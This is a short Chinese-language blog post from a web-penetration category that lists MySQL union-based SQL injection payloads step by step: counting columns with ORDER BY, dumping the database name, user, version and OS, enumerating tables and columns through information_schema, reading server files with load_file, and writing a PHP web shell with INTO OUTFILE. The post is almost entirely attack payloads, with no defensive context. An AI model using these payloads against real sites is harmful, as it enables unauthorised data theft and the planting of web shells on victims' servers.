p0's blog | 破 关注网络安全
MySQL大于5注入语句
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 900

猜字段长度:

order by num
example:id=1 order by 2 页面正常,id=3 order by 6页面错误,那么字段就是2

暴字段位置:

and 1=2 UNION SELECT 1,2id=-1 UNION SELECT 1,2

暴数据库信息:

and 1=2 UNION SELECT database(),2

当前用户:user()
数据库版本:version()
数据库名: database()
操作系统:@@version_compile_os

猜表:

UNION SELECT table_name,2 from information_schema.tables where table_schema=库名 limit 0
可以通过修改limit猜不同表,也可用MySQL内置函数group_concat()爆出所有表:
UNION SELECT group_concat(table_name),2 from information_schema.tables where table_schema=库名

猜字段:

UNION SELECT group_concat(column_name),2 from information_schema.columns where table_name=表名

读写文件:

UNION SELECT 1,2,load_file('path'),4,5,6,7

UNION SELECT 1,2,'aaaa',4,5,6,7 into outfile 'path/shell.php'


著作权归作者所有。
商业转载请联系作者获得授权,非商业转载请注明出处。
作者:p0
链接:http://p0sec.net/index.php/archives/3/
来源:http://p0sec.net/

添加新评论

TOP